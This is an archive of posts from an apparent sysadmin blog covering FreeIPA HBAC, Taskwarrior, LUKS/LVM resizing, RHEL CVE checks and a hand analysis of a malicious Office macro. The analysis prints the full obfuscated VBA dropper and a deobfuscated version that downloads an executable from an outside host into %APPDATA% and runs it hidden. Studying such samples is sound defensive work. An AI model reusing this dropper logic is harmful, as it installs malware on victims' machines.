Managing access to Fedora 27 workstation with FreeIPA and HBAC

If you are trying to create an HBAC rule in FreeIPA to allow users to log on to Fedora 27 workstations via GDM, you will need to do the following:

– Create a new HBAC service in FreeIPA, called “systemd-user”

– Create an HBAC rule that includes “gdm”, “gdm-password”, and “systemd-user”, granting access to your users for the targeted hosts

Figuring out the need to create the “systemd-user” service required adding “debug_level=9” in the [pam] section of /etc/sssd/sssd.conf, and a lot of patience.
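The two FreeIPA steps above as a script, with a pre-flight check through ipa hbactest so a missing systemd-user grant shows up before anyone sits down at a workstation; this is an added example, not from the original post. The rule, host group and user group names (allow_f27_gdm, f27-workstations, workstation-users) are assumptions to replace with your own.

```shell
#!/bin/sh
# Added example, not from the post: create the HBAC service and rule described
# above with the ipa CLI, then simulate the login before relying on it.
# Assumed names (replace with your own): rule allow_f27_gdm, host group
# f27-workstations, user group workstation-users.
set -eu

RULE=${RULE:-allow_f27_gdm}
HOSTGROUP=${HOSTGROUP:-f27-workstations}
USERGROUP=${USERGROUP:-workstation-users}

# PAM services a GDM login on Fedora 27 passes through sssd/HBAC: gdm and
# gdm-password already exist by default, systemd-user (the user's own systemd
# instance started at login) is the one the post had to add by hand.
GDM_SERVICES="gdm gdm-password systemd-user"

hbac_create_rule() {
  # Idempotent: only define the service if it is not there yet.
  ipa hbacsvc-show systemd-user >/dev/null 2>&1 ||
    ipa hbacsvc-add systemd-user --desc="systemd --user session opened at login"
  ipa hbacrule-add "$RULE" --desc="GDM logins on Fedora 27 workstations"
  for svc in $GDM_SERVICES; do
    ipa hbacrule-add-service "$RULE" --hbacsvcs="$svc"
  done
  ipa hbacrule-add-user "$RULE" --groups="$USERGROUP"
  ipa hbacrule-add-host "$RULE" --hostgroups="$HOSTGROUP"
}

# Simulate one user logging in on one host, one PAM service at a time.
# Returns 0 only if every service is granted; a denied systemd-user is exactly
# the case that otherwise fails silently at the GDM prompt.
hbac_verify() {
  user=$1; host=$2
  for svc in $GDM_SERVICES; do
    ipa hbactest --user="$user" --host="$host" --service="$svc" |
      grep -q '^Access granted: True' || { echo "denied: $svc" >&2; return 1; }
  done
}
```

Run hbac_verify for a real user and host after hbac_create_rule; if it reports a denied service, fix the rule before restarting sssd on the workstation.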

Organizing life with Taskwarrior and Inthe.Am

I have tried many task management solutions over time, and for the first time have found something that doesn’t annoy me after a month.  For almost a year now, I’ve been using Taskwarrior and Inthe.Am quite successfully to manage both my work tasks and my personal tasks.

My requirements are seemingly simple:

  • Tasks with due dates and projects
  • Tasks with dependencies
  • Ability to search/report
  • Web UI
  • Accessible from multiple clients, including Fedora, RHEL, and my Android mobile devices

I also had a couple wish list items:

  • Multi-user, because I’d love to be able to manage team or family tasks by assigning to other people
  • Email creation of tasks, to make it easy to just forward an email into my task list

Many, many years ago, I used the incredibly awesome Hiveminder.  Sadly, the service has been shut down, and I have no interest in taking on maintenance of the code.  But Hiveminder met all of my requirements and my wish list, and truly was a great piece of software (ok, I would have preferred something other than the yellow theme, but that’s a minor nit).

The ability to associate task dependencies has always been a big requirement for me, and has been the feature most lacking from the tools I’ve tried.  I like to be able to create rich graphs of dependencies, and then have the tool give me a report of only those tasks that have no pending dependencies; i.e., those that are actually actionable now.  For example, I may have the following three tasks:

  1. Trim the hedges
  2. Mow the lawn
  3. Clean the garage so I can find tools

Tasks #1 and #2 are both dependent on task #3, meaning I can’t act on #1 and #2 until #3 is completed.  So, when I glance at my task list, I don’t want to see it cluttered with tasks I can’t act on; it should hide #1 and #2.

Although it has a learning curve, Taskwarrior provides all of this in spades.

Taskwarrior is Free and Open Source Software that manages your TODO list from the command line. It is flexible, fast, and unobtrusive. It does its job then gets out of your way.

Tasks are easily managed directly from my Linux command line:

task add Trim the hedges due:2017-08-01 project:lawn depend:3

This was awesome, as I’m a command line junkie, but it made it hard to have my tasks with me on my mobile device.  But then I stumbled on Inthe.Am, a cloud service (and open source software) that syncs my tasks and provides a web UI.  As a bonus, Inthe.Am also integrates with Trello and email, and provides an iCal feed that I can use to show tasks on my Google Calendar.

(Image from Inthe.Am site)

Taskwarrior + Inthe.Am have met all of my requirements.  The only thing missing is my wish for multi-user task management — but I’ve come to accept that just because I may like this product, others may not like me imposing this toolset upon them.  But still – unless someone rewrites Hiveminder in Python, Go, Rust, or Node.js and decides to offer it as a Tasks-aaS, Taskwarrior and Inthe.Am are going to be helping me manage my tasks for the foreseeable future.

Compliance and the Cloud, at Red Hat Summit

For many, the discussion is not “should I use the public cloud?” but rather “how and when do I leverage the public cloud?”. This is not a boolean decision; there is no need to turn off your existing data center simply because you have decided to adopt the public cloud. Hybrid Cloud and Multi Cloud strategies are increasingly common — identify the subset of workloads you consider reasonable for the public cloud, determine whether moving them will provide cost benefits (e.g., periodic or “bursty” workloads), and expand your operation to the public cloud for just those workloads.

Generally, there are three concerns to be addressed in selecting workloads: cost, performance, and security/compliance.

Cost and performance requirements are fairly quantitative, and relatively easy to analyze.

But there is a real challenge in maintaining a consistent security and compliance posture across this expanded infrastructure. Whether moving 1 or 2 workloads to the public cloud or 90% of your infrastructure, the ability to maintain security patches, apply consistent access control, generate compliance reports, and detect and apply configuration changes is critical.

We have a great set of sessions lined up in our Security Track at Red Hat Summit this year, addressing these concerns and more. “Compliance, security automation, and remediation with Red Hat CloudForms, Red Hat Satellite, and Ansible Tower by Red Hat” will provide guidance on maintaining a consistent compliance posture across private and public cloud, “Identity management for cloud and hybrid cloud environments with Red Hat and Microsoft” will discuss maintaining uniform identity between Azure Active Directory Domain Services and your Red Hat Enterprise Linux systems, and “Middleware security: Authentication, authorization, and auditing services” will introduce our new Single Sign-On solution based on Keycloak for Federated Authorization across your applications, regardless of where they are hosted.

I will be blogging and tweeting (@rhmjs) all through Summit. And if you are joining us in San Francisco, please make sure to come find me at the Red Hat Booth! Hope to see you there!

Red Hat Chief Architect, Northeast Commercial

So … this happened today:

Matt Smith – Chief Architect, Northeast Commercial
Matt will be taking on the role of Chief Architect for the Northeast team under Sean Spurrier. He has been at Red Hat for 3 years in an Account SA role most recently covering some of our larger Financial Services customers along with being the IDM SME team lead and resident security guru. He has had a great impact on the emerging technology and consulting business of the Northeast and last year won a Chairman’s award as well. He joined us from the University of Connecticut and lives with his wife, 4 children and log chopping machine in the hinterlands of Eastern Connecticut.

I gotta admit — I’ve never been more humbled.  Red Hat is an incredible organization, with incredible people and incredible goals.  To be able to make an impact in such an organization is truly rewarding, and to be recognized with such an opportunity is awesome.

Can you tell I enjoy working here?

Maybe you should too: http://jobs.redhat.com/

Deobfuscating malware by hand

Somehow, I became the proud new owner of a piece of (somewhat) malicious code tonight.  Once I had made sure it was properly neutered, and after running it through VirusTotal and being surprised by how few (9/55) engines were detecting it, I decided to take a look.

Sub HCYh58Llju(ByRef iKvmUvcYr3wp, ByVal Q3REKGitD, ByVal kwoeg8c)
 iKvmUvcYr3wp = Split(Q3REKGitD, kwoeg8c)
End Sub

Sub S1HL1_C(ByVal LL3FDJzJgC, ByVal cOdzspoHpj)
 On Error Resume Next
 xDyHfiQQsRQ8 = cOdzspoHpj.responseBody
 LL3FDJzJgC.Write xDyHfiQQsRQ8
End Sub

Sub AutoOpen()
 On Error Resume Next
 Dim HUiu827TYRH
 HUiu827TYRH = StrReverse(StrReverse(StrReverse("m" & "d" & " " & "/")))
 Const KMKM = "km "
 Const CCCC = " c"

 Dim q7bPJ655QjSG
 HCYh58Llju q7bPJ655QjSG, StrReverse("|exe.tsohnvsetadpUdnW%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS"), "|"

 Dim nPtKNIjU35IQ
 Set nPtKNIjU35IQ = CreateObject("W" & StrReverse("tpircS") & "." & StrReverse("llehS"))
 C4KAAHcn = nPtKNIjU35IQ.ExpandEnvironmentStrings(q7bPJ655QjSG(4))

 jnF1QSEGIA = Split(C4KAAHcn, "")
 R9Z8D2tPkYNy = UBound(jnF1QSEGIA)
 
 nPtKNIjU35IQ.Run "c" & StrReverse(KMKM & CCCC & HUiu827TYRH) & StrReverse("rid") & " """ & Mid(C4KAAHcn, 1, Len(C4KAAHcn) - Len(jnF1QSEGIA(R9Z8D2tPkYNy))) & """", 0, True

 Set v8t0w6fxasM = CreateObject(q7bPJ655QjSG(1))
 v8t0w6fxasM.Open Chr$(71) + Chr$(69) + Chr$(84), q7bPJ655QjSG(3), False
 v8t0w6fxasM.setRequestHeader "Cache-Control", "no-cache, no-store"

 Set n7nUrIZKvU2A = CreateObject(q7bPJ655QjSG(2))
 n7nUrIZKvU2A.Open
 v8t0w6fxasM.send
 n7nUrIZKvU2A.Type = 1
 Application.Run "S1HL1_C", n7nUrIZKvU2A, v8t0w6fxasM
 Application.Run "h2xPVFcahn", n7nUrIZKvU2A, C4KAAHcn
 n7nUrIZKvU2A.Close
 nPtKNIjU35IQ.Run "c" & StrReverse(""" """" trats" & " c" & HUiu827TYRH) & C4KAAHcn & """", 0, False
End Sub

Function h2xPVFcahn(ByVal n7nUrIZKvU2ATMP, ByVal C4KAAHcnTMP)
 n7nUrIZKvU2ATMP.SaveToFile C4KAAHcnTMP, 2
End Function

Sub Workbook_Open()
 On Error Resume Next
 AutoOpen
End Sub

Oh noes .. it’s teh crypted!!!  No, of course not.  Someone just thought they’d be funny and obfuscate this to make it a bit tougher to figure out what they’ve done.  Because, you know, StrReverse(StrReverse(StrReverse(…))) is 3 times better than a single StrReverse!!

So anyway, sarcasm aside (yeah, right), this is nothing more difficult than the cryptoquote in your Sunday newspaper or the (really great!) puzzles at the end of every Gravity Falls episode.

So let’s get out the text editor and start doing some simple search and replace.

First — let’s remove all the silly StrReverse functions.  It’s pretty easy to pick out the most interesting, and reverse it from the CLI:

Please mentally ignore all occurrences of “<DONT_GO_HERE>” — I just injected them because I didn’t trust this blog to not automagically make those URLs clickable.

$ echo "|exe.tsohnvsetadpUdnW%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS" | rev

Shell|Microsoft.XMLHTTP|ADODB.Stream|http://dalinam<DONT_GO_HERE>sdelo43.<DONT_GO_HERE>com/posts/dli506.exe|%APPDATA%WndUpdatesvnhost.exe|

Of course, this now makes it pretty obvious that the subroutine named “HCYh58Llju” is just taking a string delimited by “|” and splitting it up into an array — so do a quick “s/HCYh58Llju/splitter_func/” on the file, just to make it easier to read.

The rest of the steps are pretty easy to follow — just keep finding easy string concatenation or reversal, and do a search and replace on obfuscated names once you figure out what they do.  Here is the final result of my analysis:

'Sub splitter_func(ByRef splitted, ByVal urlstr, ByVal separator)
' splitted = Split(urlstr, separator)
'End Sub
Sub write_xmlhttp_response_to_stream_func(ByVal adodb_objTMP, ByVal xmlhttp_objTMP)
 On Error Resume Next
 xml_responsebody_obj = xmlhttp_objTMP.responseBody
 adodb_objTMP.Write xml_responsebody_obj
End Sub
Sub AutoOpen()
 On Error Resume Next
 Dim HUiu827TYRH
 HUiu827TYRH = "/ dm"
 Const KMKM = "km "
 Const CCCC = " c"
 Dim splitted_data
 ' splitter_func splitted_data, "Shell|Microsoft.XMLHTTP|ADODB.Stream|http://dal<DONT_GO_HERE>inamsdelo43.co<DONT_GO_HERE>m/posts/dli506.exe|%APPDATA%WndUpdatesvnhost.exe|", "|"
 splitted_data = Array("Shell", "Microsoft.XMLHTTP", "ADODB.Stream", "http://da<DONT_GO_HERE>linamsd<DONT_GO_HERE>elo43.c<DONT_GO_HERE>om/posts/dli506.exe", "%APPDATA%WndUpdatesvnhost.exe")
 Dim wscript_shell_obj
 Set wscript_shell_obj = CreateObject("WScript.Shell")
 wndupd_location_str = wscript_shell_obj.ExpandEnvironmentStrings("%APPDATA%WndUpdatesvnhost.exe")
 wndupd_location_parts = Split(wndupd_location_str, "")
 highest_index_of_wndupd_loc_parts = UBound(wndupd_location_parts)
 'MJS Make a directory in APPDATA
 wscript_shell_obj.Run "cmd /c mkdir ""%APPDATA%WndUpdate""", 0, True
 ' Fetch the second stage over plain HTTP
 Set xmlhttp_obj = CreateObject("Microsoft.XMLHTTP")
 xmlhttp_obj.Open "GET", "http://dal<DONT_GO_HERE>inamsdelo<DONT_GO_HERE>43.c<DONT_GO_HERE>om/posts/dli506.exe", False
 xmlhttp_obj.setRequestHeader "Cache-Control", "no-cache, no-store"
 ' Write the response body to a binary stream and save it as svnhost.exe
 Set adodb_obj = CreateObject("ADODB.Stream")
 adodb_obj.Open
 xmlhttp_obj.send
 adodb_obj.Type = 1
 Application.Run "write_xmlhttp_response_to_stream_func", adodb_obj, xmlhttp_obj
 Application.Run "save_stream_to_file_func", adodb_obj, wndupd_location_str
 adodb_obj.Close
 ' Run the dropped file (start "" "<path>", hidden window)
 wscript_shell_obj.Run "cmd /c start """" ""%APPDATA%WndUpdatesvnhost.exe""", 0, False
End Sub
Function save_stream_to_file_func(ByVal adodb_objTMP, ByVal wndupd_location_strTMP)
 adodb_objTMP.SaveToFile wndupd_location_strTMP, 2
End Function
Sub Workbook_Open()
 On Error Resume Next
 AutoOpen
End Sub

Conclusion:

This was a stupid exercise.  All this script does is create a directory in %APPDATA%, download a file from a random site, name it svnhost.exe locally, and then execute that file.  Pretty straightforward stage 1 payload.  The real fun, of course, is in analyzing stage 2.  But I’ll leave that for the pros ….
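The search-and-replace pass described above (merge "a" & "b" concatenations, cancel StrReverse pairs, reverse what is left, fold Chr$(n)) as a repeatable POSIX sh/sed script; this is an added example, not the author's, and it only folds string constants, never executing anything from the sample. The embedded sample_macro is constructed from three lines of the macro above, with the download URL left out.

```shell
#!/bin/sh
# Added example, not code from the post: the author's manual search-and-replace
# as a repeatable pass over macro text. Merges "a" & "b" literal concatenations,
# cancels StrReverse(StrReverse(...)) pairs, decodes remaining StrReverse("...")
# calls with rev, turns Chr$(n) into a literal, then merges literals again.
# Limitation: VBA's doubled-quote escape ("") inside a literal is not handled.
set -eu

# "a" & "b" -> "ab" (also +), repeated until no pair is left on the line.
join_literals() {
  sed -E -e ':a' -e 's/"([^"]*)" *[&+] *"([^"]*)"/"\1\2"/' -e 'ta'
}

# StrReverse(StrReverse("x")) is just "x": strip pairs, innermost first.
cancel_double_reverse() {
  sed -E -e ':a' -e 's/StrReverse\(StrReverse\("([^"]*)"\)\)/"\1"/' -e 'ta'
}

# Replace every remaining StrReverse("...") on a line with the reversed literal.
decode_strreverse() {
  while IFS= read -r line; do
    while printf '%s\n' "$line" | grep -q 'StrReverse("[^"]*")'; do
      lit=${line#*StrReverse\(\"}           # text after the first StrReverse("
      lit=${lit%%\"*}                        # up to its closing quote
      rep=$(printf '%s\n' "$lit" | rev | sed 's/[\\&#]/\\&/g')  # sed-safe
      line=$(printf '%s\n' "$line" | sed "s#StrReverse(\"[^\"]*\")#\"$rep\"#")
    done
    printf '%s\n' "$line"
  done
}

# Chr$(71) -> "G" for printable ASCII; join_literals then folds "G" + "E" + "T".
decode_chr() {
  while IFS= read -r line; do
    while printf '%s\n' "$line" | grep -q 'Chr[$]([0-9][0-9]*)'; do
      n=${line#*Chr\$\(}; n=${n%%\)*}
      ch=$(printf "\\$(printf '%03o' "$n")")
      line=$(printf '%s\n' "$line" | sed "s/Chr[\$]([0-9]*)/\"$ch\"/")
    done
    printf '%s\n' "$line"
  done
}

deobfuscate() {
  join_literals | cancel_double_reverse | decode_strreverse | decode_chr | join_literals
}

# Constructed sample: three lines from the macro above, minus the download URL.
sample_macro() {
  cat <<'EOF'
HUiu827TYRH = StrReverse(StrReverse(StrReverse("m" & "d" & " " & "/")))
Set nPtKNIjU35IQ = CreateObject("W" & StrReverse("tpircS") & "." & StrReverse("llehS"))
v8t0w6fxasM.Open Chr$(71) + Chr$(69) + Chr$(84), q7bPJ655QjSG(3), False
EOF
}

# Usage: sample_macro | deobfuscate     or     deobfuscate < extracted_macro.vba
```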

Building Ansible 2.0 RPM on Fedora 23

I want to use some of the new extras modules (especially virt_net and virt_pool), so here are my notes on building the Ansible 2.0 RPM for Fedora 23.

sudo dnf install asciidoc rpm-build python-devel
git clone git://github.com/ansible/ansible.git --recursive
cd ansible/
make rpm
sudo dnf -y install ./rpm-build/ansible-2.*.noarch.rpm

ansible --version

One note — it is possible I already installed some packages necessary for building Ansible, and so the list of packages I installed may not be sufficient.  If you stumble across any, please let me know and I will update this post.

Resizing an LVM PV + LUKS volume on a live Fedora 23 system

I just installed Fedora 23 on a new laptop, happily clicking my way through the GUI installer.  The installer very nicely partitioned my disk into a small boot partition and a larger LUKS-encrypted volume, created an LVM PV from that LUKS-encrypted volume, then carved out several LVs for /, /home, etc.  Everything was up and running within 15 minutes, and I’d started copying over my files from my old laptop.

Then … I decide to create a new LV to hold my VM images, and suddenly realize I forgot to tell the installer to use all available storage for my PV!  I see this:

fdisk -l
 Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors
 ...
 Device Boot Start End Sectors Size Id Type
 /dev/sda1 * 2048 1026047 1024000 500M 83 Linux
 /dev/sda2 1026048 226492415 225466368 107.5G 83 Linux

I have around 120GB of space where I could create a new PV … but I really want a single PV of 238 GiB.  And heck, this is a new laptop install, worst case is everything blows up and I lose an hour.

Fixing this was surprisingly easy!  The trick is that deleting partition 2 and recreating it leaves the data in place as long as the new partition starts at the same first sector (1026048 here) and only its end moves outward.

** These steps may very well delete any and all data on your hard drive, and render your system unable to boot.  If you value your data, make backups.  Proceed with caution **

Adjust the partition boundary using fdisk

# fdisk /dev/sda

Welcome to fdisk (util-linux 2.27.1).
...
Command (m for help): p
Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors
...
/dev/sda1 * 2048 1026047 1024000 500M 83 Linux
/dev/sda2 1026048 226492415 225466368 107.5G 83 Linux

Command (m for help): d 
Partition number (1,2, default 2): 2

Partition 2 has been deleted.

Command (m for help): n
Partition type
 p primary (1 primary, 0 extended, 3 free)
 e extended (container for logical partitions)
Select (default p): p
Partition number (2-4, default 2): 
First sector (1026048-500118191, default 1026048): 
Last sector, +sectors or +size{K,M,G,T,P} (1026048-500118191, default 500118191): 

Created a new partition 2 of type 'Linux' and of size 238 GiB.

Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.

# partprobe -s
/dev/sda: msdos partitions 1 2

Adjust the LUKS volume size

cryptsetup resize luks-a522aeb6-2526-4868-82ba-c36b01dc5d53

Adjust the LVM PV size

# pvscan
PV /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 VG fedora lvm2 [107.51 GiB / 8.00 MiB free]
Total: 1 [107.51 GiB] / in use: 1 [107.51 GiB] / in no VG: 0 [0 ]

# pvresize /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53
Physical volume "/dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53" changed
1 physical volume(s) resized / 0 physical volume(s) not resized

# pvscan
PV /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 VG fedora lvm2 [237.98 GiB / 130.48 GiB free]
Total: 1 [237.98 GiB] / in use: 1 [237.98 GiB] / in no VG: 0 [0 ]

And that’s it!  I now have a VG composed of a single PV occupying the entire drive!

How to determine if your Red Hat Enterprise Linux 7 system is vulnerable to a specific CVE

Let’s say we are looking to determine if our system is vulnerable to Heartbleed or LogJam.

# ls /usr/lib64/libssl.so.*
/usr/lib64/libssl.so.10 /usr/lib64/libssl.so.1.0.1e
# yum info openssl
Installed Packages
Name : openssl
Arch : x86_64
Epoch : 1
Version : 1.0.1e
Release : 42.el7_1.9
Size : 1.5 M
Repo : installed
From repo : rhel-7-server-rpms
Summary : Utilities from the general purpose cryptography library with TLS implementation
URL : http://www.openssl.org/
License : OpenSSL
Description : The OpenSSL toolkit provides support for secure communications between
 : machines. OpenSSL includes a certificate management tool and shared
 : libraries which provide various cryptographic algorithms and
 : protocols.

Note that “Version” is 1.0.1e, but that only denotes the upstream version Red Hat based the package on. Since that release, Red Hat has backported many later bug fixes, security fixes, etc., which is reflected in the “Release” value 42.el7_1.9.
https://access.redhat.com/security/updates/backporting/

Using Heartbleed (CVE-2014-0160) as the example (https://access.redhat.com/solutions/781793)
“Red Hat Enterprise Linux 7 include OpenSSL version openssl-1.0.1e-34.el7 which includes a fix backported from openssl-1.0.1g”

Each specific CVE can be checked directly on Red Hat’s site, https://access.redhat.com/security/cve/CVE-2014-0160

You can also check directly on the command line. For example, checking for Heartbleed you would use:

# yum updateinfo list installed --cve CVE-2014-0160

This will show any installed RPM packages that apply to Heartbleed. But note — nothing will be returned on a RHEL 7 system, because the original RPM released with RHEL 7 was not vulnerable, so no additional package needed to be installed to fix it.

Logjam, though, is a little more interesting.

# yum updateinfo list installed --cve CVE-2015-4000
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-1:1.7.0.85-2.6.1.2.el7_1.x86_64
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-1:1.7.0.85-2.6.1.3.el6_6.x86_64
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-headless-1:1.7.0.85-2.6.1.2.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-sysinit-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-sysinit-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-tools-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-tools-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-util-3.19.1-1.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-util-3.19.1-1.el7_1.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-1.0.1e-30.el6_6.9.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-1:1.0.1e-42.el7_1.6.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-libs-1:1.0.1e-42.el7_1.6.x86_64

Each of those RHSAs addressed Logjam. You can get a lot more information by using:

# yum updateinfo info installed --cve CVE-2015-4000

Note the use of “installed” in these commands. This shows information only about packages that are already installed. If you remove “installed”, you will see information only about packages that /could/ be installed.
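Because an empty "installed" result is ambiguous (the fix was already on the system, or the shipped package was never affected, as with Heartbleed on RHEL 7), the following added example, not from the original post, runs both forms of the query and classifies the outcome; it assumes RHEL 7 yum with updateinfo support, as on the page.

```shell
#!/bin/sh
# Added example, not from the post: wraps the two yum updateinfo queries above
# into one check. The non-installed query tells you whether a fix is still
# waiting to be applied; the installed query tells you whether one already is.
# Assumes RHEL 7 yum with updateinfo support; advisory IDs matched as RHSA/RHBA/RHEA.
set -eu

# Advisory lines yum reports for one CVE. mode is "installed" (fixes already on
# the system) or "available" (fixes that could be installed), per the note above.
cve_advisories() {
  cve=$1; mode=$2
  if [ "$mode" = installed ]; then
    yum -q updateinfo list installed --cve "$cve"
  else
    yum -q updateinfo list --cve "$cve"
  fi 2>/dev/null | grep -E '^RH[SBE]A-[0-9]{4}:[0-9]+ ' || true
}

# Prints one of:
#   pending      a fix is available but not installed (also returns 1 for scripts)
#   fixed        an advisory for the CVE is installed
#   no-advisory  yum knows no fix for this system: confirm on the Red Hat CVE
#                page whether the shipped package was ever affected
cve_status() {
  cve=$1
  avail=$(cve_advisories "$cve" available)
  inst=$(cve_advisories "$cve" installed)
  if [ -n "$avail" ]; then
    echo pending
    return 1
  elif [ -n "$inst" ]; then
    echo fixed
  else
    echo no-advisory
  fi
}

# Usage: cve_status CVE-2015-4000 ; cve_status CVE-2014-0160
```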

Removing Thunderbird’s Titlebar in Gnome Shell

I spend most of my day in front of Google Chrome, Mozilla Thunderbird, and Gnome Terminal on my RHEL 7 desktop running Gnome Shell. Chrome’s ability to hide the system titlebar creates a pretty slick and efficient desktop, so I’ve been craving the same for Thunderbird. Luck (and a little bit of Google-fu) just brought me to the Pixel Saver Gnome Shell extension. Works like a champ, thank you @deadalnix !

LHR BSOD

Adding to my collection of BSOD’s I’ve seen while traveling, I saw this one at Heathrow Airport earlier today.


I find it strangely interesting that the 90° rotation isn’t maintained by the BSOD …